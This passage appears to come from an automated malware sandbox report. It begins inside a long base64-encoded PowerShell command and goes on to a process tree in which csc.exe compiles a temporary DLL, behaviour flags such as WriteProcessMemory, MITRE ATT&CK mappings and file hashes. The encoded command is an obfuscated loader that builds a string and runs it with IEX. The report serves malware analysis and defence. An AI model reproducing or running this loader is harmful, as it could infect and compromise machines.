BCAGkAZABkAGEAdQBEAGkAcwB0AHIAaQBEAGkAYgByAGEAbgBQAGwAYQB0AGkAdABQAGUAbgB0AGEAIABUAG8AcgBjAGgAdgBBAGEAYgBmAG8AMQBJAG4AdABlAHIALABVAG4AZABlAHIAaQBQAHIAaQBuAHMAbgBVAG4AZABpAGcAdABBAGYAZABtAHAAIABhAG0AeQBsAHUAdgBPAG0AcABsAGEAMgBEAGUAcABhAHIAKQBLAGEAbAB2AG4AOwAKAEgAZQBuAGsAbwBbAFIAZQB2AGEAbgBEAEoAbwBsAGwAaQBsAEUAbABlAGMAdABsAEkAbgB0AGUAcgBJAE0AdQBzAHQAaQBtAHMAbwB1AG4AZABwAFMAYwBvAHIAcABvAEYAbwByAGYAaQByAEwAdQBuAGcAZQB0AFUAbgBxAHUAZQAoAE8AdgBlAHIAZQAiAFUAZABkAHIAYQBrAE0AbwBkAHIAZQBlAG8AawBrAHUAbAByAE0AYQBuAG4AcwBuAEwAaQBsAGwAaQBlAEYAbABvAHcAcwBsAEQAaQByAGUAYwAzAEQAdQBtAGIAYgAyAEMAYQBsAGEAbQAiAEQAZQBrAG8AZAApAFQAdQBiAGUAbgBdAEgAaQBzAHQAbwBwAEEAcgBiAGUAagB1AEYAbwByAHIAYQBiAFUAbgBiAHUAZABsAGYAYQBtAGkAbABpAGsAbwBtAG0AdQBjAE0AZQBnAHIAaQAgAFkAZQBsAGQAcgBzAFMAdABhAGcAaQB0AEwAaQBuAGkAZQBhAFMAbgBvAGgAYQB0AEEAdgBsAGUAZABpAEMAbwB3AHIAeQBjAFQAaQBsAG8AdgAgAEUAagBlAG4AZABlAFMAeQBkAHkAZQB4AFQAeQBkAGUAdQB0AFQAZQBtAGEAbABlAFMAcABvAGwAaQByAE8AegBvAG4AaQBuAFUAbgBmAG8AcgAgAFMAdABhAHYAZQBpAFQAZQBhAGMAYQBuAEEAbgBrAHkAbAB0AEYAaQBzAHQAcgAgAEgAbwBkAGcAawBGAE0AYQB4AGkAZgBpAFYAbwB5AGEAZwBuAGIAcgBuAGUAdgBkAFAAZQBsAGUAbABGAEUAcgBpAGMAaABpAEsAdgBpAHQAdAByAEkAbgBjAHUAbQBzAE8AYwBjAHUAbAB0AEcAcgBhAHQAZQBDAEcAdQBhAGMAaQBoAFMAYwBoAHcAZQBhAFUAYwBlAG4AdABuAFIAdgBmAHUAbABnAFMAaQBkAGUAdwBlAEYAaQBsAG0AbwBOAEYAZABlAG0AaQBvAEsAcgB1AHMAaAB0AEEAYwB0AGkAdgBpAEgAaQBuAGsAbgBmAEEAdgBvAGMAYQBpAEMAYQBuAGMAZQBjAE4AbwBuAGUAZABhAEcAYQBzAGIAcgB0AE8AeAB5AGwAdQBpAEkAbgBkAHQAcgBvAFQAZQBwAGUAZgBuAFMAcABpAHIAbwAoAEQAaQBhAHQAaABpAEkAbgBmAG8AcgBuAFcAaQBsAGsAaQB0AE0AZQBkAHYAaQAgAEkAcABzAGkAbABBAE4AeQB0AHQAZQBsAGgAYQByAHQAbABwAEkAbgB0AGUAcgBlAEsAbwBiAGIAZQB2AEsAYQBwAGwAYQBpAEoAdQBtAHAAaQAsAFQAcgBvAGUAbABpAEoAYQB2AGEAbgBuAFYAZQBsAHUAZAB0AEgAbwBsAHAAZQAgAFIAZQBjAGUAaQBQAE0AYQBuAGcAbwBhAE4AbwBuAHQAcgB0AGgAagBkAGUAcABvAEcAZQBuAG8AcABpAEwAdQByAGkAZAAsAFYAaQBsAGoAZQBpAEcAbABhAHMAYgBuAEsAbwBsAGgAbwB0AEQAYQBnAHMAcAAgAEQAcgBhAG0AYQBFAEsAbABhAHMAcwByAHMAbQBhAHIAYQBvAEIAcgBvAGQAZQB0AEgAYQBsAHYAZgApAFYAaQBjAGEAaQA7AAoAYQBwAHAAZQBsAFsAUgBlAHEAdQBpAEQARQBuAGQAbwBtAGwARABhAHQAYQB0AGwASABvAGYAdABlAEkAZABvAG0AcwBtAG0AQwBhAGwAbABpAHAAVABhAHUAdABpAG8AQgB1AGUAbgBzAHIAcgBsAGkAZwBlAHQASQBuAG0AZQBhACgATAB1AGYAdABhACIASQBtAHAAYQB0AGsARABlAGMAbwBtAGUATgBvAG4AYQBkAHIAUwB0AG8AcABwAG4ARAByAGkAZgB0AGUAVABpAGQAcwBzAGwAQgBpAG4AZABlADMASQBuAGQAcgB5ADIAWgBpAG8AbgBpACIARQBuAGMAaABhACkAdABpAGQAaQBlAF0AcwB0AG8AbwBsAHAAYQBjAG8AbABvAHUAUwBhAGwAcABlAGIAVABpAGwAbwByAGwAdAByAGUAYQB0AGkAQQBmAHMAdAB0AGMARQBqAGUAbgBkACAARABpAHMAdAByAHMAQwBlAG0AZQBuAHQAQgByAG4AZQBnAGEAQQBuAG8AeAB5AHQAUwB2AG0AbQBlAGkAQQBuAGkAcwBiAGMAUwBtAGEAbABmACAAQgBlAG4AZQBmAGUAQwBvAGQAaQBmAHgAUwBwAGUAZQBkAHQAWABkAGkAcwBrAGUAVQBuAGYAaQBzAHIAcwBpAGcAdABlAG4AUABhAHIAawBlACAASQBuAGQAYgBlAGkAVQBsAGkAdgBzAG4ATQBhAHIAcwBrAHQAcgBpAGcAaAB0ACAAcgBlAGEAYwB0AEQAUwBtAGEAZwBlAGUAVAByAGUAcwB0AHYASQBuAHQAZQByAGkAUwBuAHUAcgByAGMASwBsAGEAdQBzAGUATQBvAG4AYQBjAEkARQByAGEAbgB0AG8ATABlAGcAYQBsAEMAYgByAGQAZgByAG8AQgBvAG4AbgB5AG4AUgBlAGsAbwBuAHQATgBhAHQAdQByAHIASQBuAGQAdABhAG8AUwBhAG4AZABpAGwARAB5AHIAZQBrACgAQwBjAGsAdwBvAGkAVABoAG8AcgBkAG4AUwB0AHIAdQBkAHQAQgByAGEAdwBuACAARABhAHQAYQBiAEYATgBvAG4AYwBvAHUARQByAG4AYQB3AGwAUwB0AGUAaQByACwATwBpAGwAYwBvAGkAcwBvAGQAYQBrAG4AUwB0AHIAawBsAHQAUABhAHQAZQBuACAAVABzAGUAbQBpAEUAUwB1AGIAcABoAHMAVAByAGEAawB0AGsARQBuAGMAYQB1ADIATwBiAGwAaQB2ADQARQBtAHAAaQByADkARABlAHMAcwBlACwAbQBhAGoAZQBzAGkARQBxAHUAaQBkAG4AYwBhAGIAcgBlAHQARABlAHYAZQBsACAAUwBwAHIAbgBnAEcAQwBlAGwAZQBiAGkAUABvAHMAcwBpAHQARwBvAHMAcwBpACwAaABlAGQAZQBzAGkAUABhAHQAbwBsAG4AcwBjAGEAbgBzAHQAVABlAHMAdABkACAAQQBiAGQAaQBrAHIAQwBvAGwAbABvAGEARQBrAHMAYQBtAG0AVQBuAGQAZQByACwAQgBvAHMAawBlAGkAQwBvAGwAdQBtAG4AUwBrAG8AdgBkAHQAQgBqAGUAcgBnACAAQwBvAG4AbgBpAEgAVQBuAGQAZQByAGUAcwBhAGwAdgBpAHIAVQBkAHQAcgByACwAVABoAHkAcgBvAGkAUgBhAGIAdQBsAG4ATQB1AGMAZQBkAHQASQBuAGYAcgBhACAATgBhAHIAYwBpAGEAZABlAG4AdQBkAGwAUwB0AGkAbQBhAGsAcwBhAHQAcwBhACwAUwBvAHUAYQByAGkARgBlAGQAdABlAG4AUAByAG8AdgBvAHQARABlAGwAcABoACAAUgBvAG8AZgBoAEgAUAByAGUAcwBwAHkARwBlAG4AZwBhAGwAVABoAHUAbgBkACwAUwBsAGkAcABzAGkAbgBvAG4AZABpAG4AUwBvAGwAdgBlAHQAUABlAHQAYQBzACAAVABhAHMAdABhAFMAUgBzAHQAaQB2AHQARQBsAHMAawBlAGEAUwBhAGsAcwBlAGQAUwBlAHIAdgBpAHMARQBuAGcAbABlACkAcwBpAGQAZQBuADsACgBzAGUAbQBlAHMAWwBBAHIAYgBlAGoARABBAG0AdABzAGcAbABCAHIAbgBkAGYAbABEAGEAdABhAGIASQBIAGEAcgByAGkAbQBWAGUAbgBvAG0AcABSAHUAbQBmAGEAbwBWAGUAbABzAG0AcgBJAHIAZQB0AHQAdABCAGUAZABhAGEAKABqAHUAbABpAGQAIgBOAG8AbgBzAGUAawBCAGkAcwBoAG8AZQBzAGsAYQByAHAAcgBmAG8AcgBiAGkAbgBQAHIAZQBhAGQAZQBWAGEAbgBkAGkAbABCAGUAZgByAGkAMwBrAHUAbgBkAGUAMgBKAHUAaQBzAGUAIgBUAGEAYwBhAG0AKQBEAHIAdQBuAGsAXQBSAGUAbABlAHYAcABVAHMAdQByAHAAdQBWAGkAawBpAG4AYgBLAHUAZwBsAGUAbABCAGkAbABsAGUAaQBPAHYAZQByAGUAYwBEAGUAYwByAGUAIAByAGUAcABsAGkAcwBEAHUAZwBwAHUAdABUAGkAbABwAGEAYQBIAGUAagBkAGkAdABSAG8AcwBlAG4AaQBUAHkAcgBhAG4AYwBSAGUAYwBvAHIAIABCAHIAYQBuAGsAZQBSAGEAZwBsAGEAeABCAGEAYwBjAGEAdABQAGEAbABlAHIAZQBGAG8AcgBzAGwAcgBCAGUAYgB1AGQAbgByAGUAYQBiAHIAIABVAG4AYwBsAGUAaQBTAHAAZQByAG0AbgBVAG4AcAByAGUAdABTAGMAbABlAHIAIAB0AHIAYQBzAHMAUwBBAGMAZQB0AHkAZQBEAGUAbgB0AG4AdABBAG4AdABpAGwARQBVAG4AYwB1AHIAcgBLAG8AbgBnAHIAcgBTAGsAcgBpAHYAbwBBAGYAdABlAG4AcgBBAHUAdABvAHAATQBVAGwAeQBrAGsAbwBTAHAAaQBsAGQAZABNAHkAcgBtAGUAZQBJAGMAaABpAGIAKABNAGkAbgB1AHQAaQBSAHUAZABsAG8AbgBlAHIAaQBjAGgAdABHAHIAaQBtAGEAIABDAG8AZQBuAGUAQgBVAG4AdAByAGEAbwBCAGkAcwBvAG4AbQBNAGUAbgBlAGwAYgBBAGYAawBvAGwAYQBLAGEAbgBkAGUAKQBQAHIAZQBnAGcAOwAKAEoAYQBnAGUAcgBbAEwAYQBuAGQAbABEAEUAZgB0AGUAcgBsAFMAZQBrAHIAZQBsAFIAZQBrAHIAdABJAFIAdQBtAG0AaQBtAFMAawBpAGYAdABwAFIAZQBuAGQAZQBvAFMAZQBsAHYAcwByAEkAbABkAGYAdQB0AEMAbwBtAG0AZQAoAE4AbwBuAGkAbgAiAEkAbgBjAHUAbAB3AFMAcAByAGkAdABpAE8AdgBlAHIAZgBuAFcAZQBsAGwAaABzAEoAZQBuAGwAeQBwAFQAYQBiAGUAbABvAFMAeQBuAGUAYwBvAEgAdQBzAGgAYQBsAEYAbwByAGIAcgAuAFUAbgBkAGUAcgBkAFUAYQBwAHAAZQByAHAAdQBzAHoAdAB2AFYAYQByAGkAYQAiAE4AcgBiAGkAbAApAEIAdQBsAGwAZQBdAE8AbQBmAG8AcgBwAEIAYQBhAG4AZAB1AEIAbABhAGUAbQBiAHMAawBpAG4AbQBsAFQAbwB0AGEAbABpAFQAZQBnAG4AZQBjAEgAaQBwAHAAbwAgAEkAbgBkAG0AZQBzAEgAagBlAG0AbQB0AEYAbwByAGwAZgBhAEgAYQBuAGcAYQB0AEkAbgBzAHUAcABpAEIAdQBsAGwAZgBjAFAAcgBlAHMAcwAgAFMAbwBsAGQAaQBlAEQAcgBhAGcAZwB4AEgAdQByAHQAbAB0AEMAaABsAG8AcgBlAEQAeQBrAGsAZQByAEgAbwBtAG8AZQBuAEkAbQBwAGwAZQAgAEwAbQBtAGUAbABpAE0AaQBkAHIAYQBuAE8AcgBrAGUAcgB0AFcAZQBhAHMAZQAgAEsAaQBvAG4AZQBHAFcAaQBlAG4AZQBlAFMAawBsAHYAZQB0AE0AYQBjAGgAaQBQAEYAbAB1AHAAaAByAEIAbwB1AGcAYQBpAE8AcgBkAGYAbwBuAFMAawBhAGEAcgB0AEwAeQBuAGMAaABlAFMAawBpAGIAcwByAHMAbgBlAHIAdAAoAE0AZQByAG8AaQBpAFIAaABvAGUAYwBuAEgAZQBsAHYAZQB0AFAAYQByAGkAcwAgAFMAcAB5AGQAcwBKAHAAbABpAGcAdABhAEkAZABoAGkAcwBiAEMAZQByAGEAbQBvAFUAdgBpAGwAbAByAFAAbwBzAHMAZQBhAGMAbABpAG0AYgAsAFMAeQBzAHQAZQBpAFQAdgBhAG4AZwBuAEMAZQBxAGMAYQB0AFMAbABhAGIAYgAgAEUAdQBjAG8AcABSAE8AdgBlAHIAbQBlAFAAcgBvAHQAbwB2AEUAcgBhAGQAaQAsAEgAbwBzAHQAYQBpAEsAaQBsAHQAcwBuAEMAaABpAGEAcwB0AEgAYQBtAG0AZQAgAFMAaQBtAG8AbgBIAEwAZAByAGUAbwBhAFMAcABpAGMAZQB1AFMAawByAGkAdgBuAEYAcgBhAGcAaQAsAFAAbwBsAGkAdABpAE8AdgBlAHIAbQBuAFkAZQBtAGUAbgB0AEEAbgBkAGUAagAgAE4AdgBuAGkAbgBVAEQAaQBwAGgAdABkAFYAYQByAGkAYwByAEMAbwB3AHkAagBhAEgAbwBuAG8AcgBhAE8AbQBmAGEAdgAsAEUAawBzAGUAZwBpAEkAbgBkAHAAYQBuAFQAcgBvAHAAaAB0AEQAdQB0AHkAdQAgAEkAbgBkAGUAbQBkAFIAYQBkAGUAcgBlAEIAdQBzAGkAZQB2AFMAdABhAHYAcgBlAEIAdQBrAHMAZQBsAEwAZQBnAGEAcgApAFYAZQByAGEAdAA7AAoAZQBsAGwAaQBwAFsASABvAGEAcgBpAEQAVAByAGkAZABlAGwATQBhAGMAcgBvAGwAUABhAHIAZQByAEkAUAB1AHIAaQB0AG0ATABhAGMAdABhAHAARgByAGEAdgBlAG8AUgBlAGMAcgBhAHIAUwBrAG8AdABwAHQATQBhAHIAZwBpACgASQBzAG8AZwBsACIAVgBvAHQAYQBsAHUAVQBuAGQAZQByAHMAVQBuAGQAZQByAGUARwBlAG4AZQByAHIAcwBrAHIAdQBiADMARgBlAHIAbwBjADIAUABvAHMAdABnACIAUwBvAHIAZABhACkARgBhAG0AaQBsAF0AZwBhAHMAdABzAHAAQwB1AGwAdAB1AHUAQgByAGUAZQBjAGIAVABpAGwAYgBlAGwATwBwAGIAeQBnAGkARwBoAGEAcwB0AGMAUABsAGEAZwBpACAARgBvAHIAbQBrAHMARQBzAG8AdABlAHQAYQB0AG8AYwBpAGEAUwBjAGgAbwBsAHQARABlAHYAaQBkAGkAQQByAG0AYQBnAGMARABlAG4AYQB0ACAARABpAHMAdAByAGUARgBvAHIAcABsAHgAUwBwAGkAcgBlAHQAQwBhAHIAaQBiAGUARABpAHMAdABhAHIAaABlAG4AbABlAG4AUwBuAGUAawBrACAARQBsAGUAYwB0AGkASABhAGwAdgBlAG4AUAByAG8AdABlAHQAVQBuAGMAbwBuACAAQgBlAHYAaQBkAEQASABlAGEAZABtAGUARgByAGkAbQByAGYAQgBhAGwAbABlAEQAQgBpAGcAbgBvAGwAUgBlAHMAcABpAGcAVABvAGkAYgBvAFAAUgBlAHYAbwBrAHIATQBpAHMAYwBoAG8AcwBhAG0AbABlAGMAVABlAGwAZQBmACgAUwBvAGQAYQB2AGkAcAB1AGUAYgBsAG4ATQB1AGwAdABpAHQAVgBpAGQAZQByACAAVQBiAGUAaABhAEsAdABvAG0AYgBhAG8ASABhAGQAcwBrAGIAVAByAGkAYQBzACwARwBhAHIAbgBlAGkASwBvAGEAcwBhAG4AUgBhAGEAZABnAHQAVABvAHQAYQBsACAAVQBuAGQAZQByAEEAQQBlAHMAdABoAG4ARAByAGUAdABzAHMAQQBiAG8AbQBhAHQAVQBuAGMAbwBuAGkAQwBlAHIAYgBlACwARgBhAGcAZQBsAGkAQwBhAG0AaQBzAG4AUABoAGkAbABhAHQARwBhAGwAbABlACAARgBpAGcAcgBlAE8AZgBkAGUAZwBvAHAATwBwAHQAaQBtAHMAQQBzAGYAYQBsAGkAUwB1AG4AZABoACwAUwBsAGIAZQB0AGkATwB2AGUAcgBoAG4ARwBhAGwAZwBlAHQAdgBlAHIAdABpACAAVABhAHAAYQBkAHIARABlAG0AaQBtAGUAQgBsAGUAbgBuAG4AQQBiAGIAbwB0AHUAcAByAGkAZABpACkASwBqAGUAbABsADsACgBJAHIAcgBlAHYAfQAKAEcAZQBqAHIAcwAiAFMAcABhAHQAaQBAAAoAcwBlAGsAdQBuACQATABlAGcAZQBtAEkAUwB0AGEAdABpAG4AYgBlAGwAbABpAHQARABlAGMAbABpAGUAQQBmAGsAcgBpAHIAUwB2AGUAcwBrAG4ASgBhAG0AYgBvADMAUwB5AG0AcABhAD0ASwBtAHAAZQB2AFsARQB4AHAAbABhAEkASABvAHYAZQBkAG4AcABzAHkAawBvAHQASwBsAG8AcgBlAGUASAB1AHMAbABnAHIAVAByAG8AYwBoAG4ASQBuAGQAcgBpADEAVABoAGUAcgBtAF0AUABpAG4AbgBpADoAQgB1AHMAcwBlADoASABqAHIAbgBlAFYARgBvAHIAaABhAGkATwB1AHQAaABpAHIAUgBpAGIAYgBlAHQARgBpAGwAbwBsAHUARgBsAGEAbgBrAGEARwByAGEAdgBzAGwATgBlAHQAdABlAEEAVQBuAGQAdgBpAGwATgBvAG4AYQByAGwAUAByAGUAYwBpAG8AUwBjAG8AbABlAGMAUgBpAGcAaABvACgARgBvAHIAcwB0ADAASwBvAG4AdABpACwATQBlAG4AbgBlADEASQBuAGoAdQByADAARQBtAGEAbgBjADQAUwBpAGwAaQBxADgAUAByAG8AdABoADUARgBsAGEAcwBrADcAUwBwAGkAbABsADYAQwBlAG4AdABlACwAbABlAGoAbABpADEAdQBvAHAAZAByADIASwBvAG8AcgBkADIAVgBpAG4AcgBkADgAUgBlAG4AdABlADgARgBpAGwAbQB1ACwARABlAGwAcwB0ADYAQgBhAGgAYQBtADQARgBvAHIAZQBxACkACgBVAG4AcABlAHIAJABQAHUAcgBpAHQAUgBTAGkAZABlAHIAaQBHAGEAbABsAGUAZwBTAHQAZQByAGUAcwBBAHIAYQBiAGUAdABTAGsAbwBsAGUAZQBWAHIAZABpAG8AbABJAG4AcwBlAG0AZQBRAHUAbwBpAGwAPQBDAGEAcABlAGEAKABTAGsAaQBsAGkARwBOAHkAcwBnAGUAZQBGAHIAYQB1AGwAdABNAGEAawBlAGQALQB2AGEAcgB2AGkASQBQAGgAeQB0AG8AdABVAHMAbABlAHEAZQBSAGUAYwByAGkAbQBQAGkAZQB0AGUAUABFAG4AZQB1AGwAcgBpAG4AawBsAHUAbwBDAG8AcgByAGUAcABJAG0AcABsAG8AZQBLAGUAagBzAGUAcgBUAHkAZABuAGkAdABGAGwAYQBkAHQAeQBBAHUAZABpAG8AIAB1AG4AZABlAHIALQBUAHIAZQBrAGsAUABCAHIAYQBzAGkAYQBEAGoAdQByAHMAdABGAGwAbABlAHMAaABGAG8AcgBuAGUAIABBAHAAdABlAHIAIgBBAGwAYgBvAGMASABOAG8AbgBjAGgASwBVAG4AZABlAHIAQwBOAGUAdQByAGEAVQBlAHYAaQBsAHcAOgBTAHYAcgB2AGcAXABUAGkAbgBnAGwAUwB0AGUAbABlAGYAbwBDAG8AbQBwAGEAZgBBAHQAeQBwAHkAdABLAHIAeQBwAHQAdwBVAG4AYwB1AHIAYQBGAHUAbABkAGIAcgBEAGQAaQBzAGMAZQBUAHIAYQB1AG0AXABTAGUAbABlAG4AVABFAHUAcgBvAGsAbwBFAHQAdwBlAGUAawBQAGEAbgBkAGkAcgBCAGEAZwBnAHIAbwBSAGUAYwBlAHAAbgBTAHAAaQBsAGQAZQBFAHAAaQBzAGMAcgBlAHgAYQBjAHQAcwBCAHIAbgBlAHIAZgB1AG4AbgBlAGcAIgBPAGIAcwBlAHIAKQBOAGUAYQByAHMALgBPAG0AbgBpAGYAUwBTAHcAYQBiAGIAdABUAGUAbABlAHMAcgBNAGkAcwBnAGEAYQBQAG8AZABvAHAAZgBMAHkAYgBrAGsAZgBTAHAAZQBlAGQAZQAKAEEAZwBuAGEAdAAkAE0AYQB0AGgAaQBMAEEAbgB0AGkAcABhAFQAYQBuAHoAYQB1AEsAaQBsAGQAZQBnAEwAZQB1AGsAYQBoAFcAbwBvAGQAcgBhAFIAZQB3AGkAbgBiAHUAbAB5AGsAawAgAFQAZQBnAG4AcwA9AEcAdQBpAGwAbAAgAEMAbABlAHIAZwBbAE4AbwBuAGQAaQBTAFAAbwByAHQAZQB5AEwAbwBhAHQAaABzAFMAYQBtAG0AZQB0AE4AbwBuAHQAZQBlAFAAYQByAGEAbABtAFAAZQBjAGEAbgAuAFIAdQBsAGwAZQBDAGYAbwByAGwAaQBvAEsAbwBuAGQAZQBuAFMAdQBwAGUAcgB2AEwAYQBrAHkAZABlAEUAbABlAGMAYQByAFIAZQB3AGEAcgB0AFAAcgBpAG8AcgBdAE8AdgBlAHIAZwA6AEEAdAB0AHIAaQA6AFMAbABpAHAAdABGAFQAcgBzAGsAZQByAEUAbgByAG8AbwBvAHMAZQByAHYAaQBtAE8AdABhAHIAeQBCAEEAbABlAGsAcwBhAEEAYQBnAHIAZQBzAFIAaQBuAGcAaQBlAEYAdQBuAGQAYQA2AE0AdQBzAGUAdQA0AEQAZQB0AGEAaQBTAFAAYQBzAHMAaQB0AEEAZgBzAGsAYQByAEwAYQBkAGQAZQBpAFYAYQBuAGQAcABuAE0AYQBkAHIAZQBnAEwAeQByAGUAcgAoAEsAZQBtAG8AdAAkAE8AdgBlAHIAcABSAEIAcgBpAGwAbABpAE0AaQBjAHIAbwBnAEgAYQBuAGQAZQBzAEgAYQB2AHIAbgB0AEIAdQB0AGkAawBlAEkAbgBkAHUAcwBsAEcAZQB5AHMAZQBlAEUAawBzAGEAbQApAAoAUwBhAGwAZwBzAFsARgByAGkAcwB0AFMARgBpAHIAYQBhAHkASgBlAHQAdABlAHMAUwBuAGUAcgBwAHQAVABpAG0AZQBrAGUAUwBvAHUAdABoAG0AUwBwAGwAZQBuAC4AUABoAG8AYwBlAFIAUwB0AHYAYgByAHUAQgBpAGwAdABpAG4ASwB1AHIAdgBlAHQARgBpAGQAdQBjAGkARgBvAHIAawBvAG0ARgBpAHMAawBlAGUARwBpAGcAYQBzAC4ASwBhAG4AaQBuAEkAUwBlAG4AZwBlAG4AUgBlAHYAaQBjAHQARAB5AHIAbABnAGUAQQBuAGsAeQBsAHIAUAByAGUAcABvAG8AUwBwAGwAYQBuAHAAdABvAGcAZQBkAFMAZwByAHUAbgBkAGUAVABpAGQAcwBvAHIAQwBlAGwAbAB1AHYAUAB1AGwAZQBnAGkAQgB1AGcAbgBlAGMAQQBmAHMAdABlAGUASABlAG4AbABnAHMAUgBlAGEAbgBlAC4ATgBhAHYAbABlAE0ATQB1AGQAcwBsAGEAUgBhAGYAdABlAHIAUwB1AHQAdABlAHMAUwBjAHkAdABoAGgARwByAGUAdABlAGEAQgBlAGYAcgBhAGwASgBlAG4AdgByAF0AVABoAGkAZQBmADoAQwBoAGkAdABpADoAbABhAG4AYwBlAEMASwBpAHQAbgBhAG8AUwB0AHIAbwBrAHAAQQByAGEAYgBpAHkAQgBpAGwAbABlACgAQwBsAGEAdgBlACQAQQBvAHUAZQBsAEwARQB5AGUAYgByAGEARAB5AHMAYwByAHUAQgByAHUAZwB0AGcARAB5AHMAdABvAGgAUABhAGwAdQBkAGEAQgB1AHQAaQBrAGIAQgByAGUAcABpACwAQQBjAGEAbAB5ACAAQQBpAHMAdABvADAAYgB1AHQAYwBoACwAUgBlAGMAZQBuACAARwBhAGYAZgBlACAAQQBmAHYAYQBlACQARgBvAHIAcwBhAEkARwByAGEAcABlAG4AbwBwAGEAcgBiAHQAVQBuAGcAYQByAGUAVQBtAGIAcgBlAHIAQwBsAGEAcwBwAG4AVQByAGkAbQBlADMARgBqAGUAcgBkACwAcwB0AGEAdABzACAAUwBwAGwAYQBzACQATABhAHIAeQBuAEwAQQBsAGYAbwBuAGEARwBhAHcAbQBzAHUAUgBhAG4AZwBsAGcATwBjAGgAbABvAGgAQgBlAGsAZQBuAGEAUABvAGwAaQB0AGIAWgBlAGEAbABvAC4AZQBrAHMAbwByAGMASwBhAGwAZQBuAG8AUwBuAHUAZQBkAHUAcwB3AGkAdABoAG4AQwByAG8AdwBuAHQAUwBwAGkAawBlACkARABvAHcAcwBlADsACgBBAGYAZgByAG8AWwBCAGUAdABvAG4ASQBDAG8AbQBtAGEAbgBQAGwAaQBzAHMAdABIAGUAdQByAGkAZQBDAGEAYgBvAGMAcgBTAHAAaQBsAGsAbgBPAHAAYgB5AGcAMQBOAG8AdQBwAHAAXQBNAG8AcgB0AGcAOgBTAGMAYQB2AGUAOgBDAGEAbgBkAGwARQBEAGUAawBvAHIAbgBBAHMAZQBjAHIAdQBPAG0AcwB0AGIAbQBMAGUAdABhAHIAUwBBAGQAZwBhAG4AeQBCAGUAdAByAHkAcwBUAGEAawBlAHIAdABVAG4AZwBkAG8AZQBWAG8AdwBlAGwAbQBQAHIAaQBjAGkATAB0AG8AdABhAGwAbwBVAGQAbABlAGQAYwBGAGwAbwBwAHAAYQBGAG8AbABrAGUAbABIAG8AbQBlAHQAZQBQAGUAbgBzAGkAcwBTAGQAZQBsAGkAQQBPAHAAZQByAGUAKABPAHYAZQByAGUAJABOAG8AbgBjAHIASQBBAG4AbABnAHMAbgBFAGYAZQB1AHMAdAB1AG4AdAByAGEAZQBBAGYAZABvAGUAcgBpAHMAbwBsAGEAbgBHAGEAcgB2AGUAMwBTAHEAcgB0AG0ALABEAGUAbgBzAGkAIABDAGgAZQB2AHIAMABMAGEAbgBkAHMAKQBTAGkAbABpAGsAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABGAGkAcgBlAGYAaQAuAEwAZQBuAGcAdABoAC0AMQA7ACAAJABpACsAPQAoADUAKwAxACkAKQANAAoAewANAAoACQANAAoACQAkAE4AYQBiAG8AYgB5AGUAIAA9ACAAJABOAGEAYgBvAGIAeQBlACAAKwAgACQARgBpAHIAZQBmAGkALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABGAGkAcgBlAGYAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABOAGEAYgBvAGIAeQBlACAAPQAgACQATgBhAGIAbwBiAHkAZQAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAE4AYQBiAG8AYgB5AGUADQAKAA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lna3q2mw\lna3q2mw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:308
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD304.tmp" "c:\Users\Admin\AppData\Local\Temp\lna3q2mw\CSC9EAD762DF22B4EC69D80C1DDD73E8225.TMP"
      4⤵
      PID:3956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD304.tmp

Filesize
1KB

MD5
67a1acffc56f7a9aac91b8efb49d4f5b

SHA1
f6789d1cad3cd00ea80e9bfd8a984b6b4b31f13a

SHA256
6938ae6d10e5456b7cc3e0fd37e3b4e6d54a993e19f1c50b7de0858daf8749ed

SHA512
ed9ae853388b2d0e061f652f86a1bd3d4e972cabb2e6c40b640eaa7c0e74663fd0116920f106d8d90c32f52f5bfc64962174e7ef86a04706c3ba5361bd6c0848

Download Submit
C:\Users\Admin\AppData\Local\Temp\lna3q2mw\lna3q2mw.dll

Filesize
4KB

MD5
5d8c9d7cf3c08c1f3605c1768e160ff8

SHA1
81ac9eca8be9b74e9df6ef52e047eab70620cef3

SHA256
a2c779d66eb80e241f5ec0b485e00551ecf3fb650e35e492a86880db7c490153

SHA512
d7dfff66b2659d2a0fd66dbe9e7e806f660a1c6168d5f355e118f46799019c708dcceaf309a54327acd9fd12e18de32cec4db0ee91910897041b09e51b6d39e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lna3q2mw\CSC9EAD762DF22B4EC69D80C1DDD73E8225.TMP

Filesize
652B

MD5
e1aad854a7094574c7d6b1e2d64ce077

SHA1
cbe19a60604bcc240992f3e94d6672955214d489

SHA256
64749933ce63f444b269750d927f1ef932f6d23a6f809c964ded05eebf999298

SHA512
3c0473815f8a10aeedd7b32b9fcd6ce732f552c86f44d7f4e3069bdae276bdf07b9c586e233c8415dc5fe6a59f3634ad0322645510acd11d4be8dab92c2fb48e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lna3q2mw\lna3q2mw.0.cs

Filesize
1KB

MD5
89695310a0fad26ce505afb21b54ca20

SHA1
3a221bdedd69ee681f8bebb55e5506b2fc4a4577

SHA256
f7fb89e6ed342862f530155e1373a36abc1296ba7bc103aa3fa479f61e12df75

SHA512
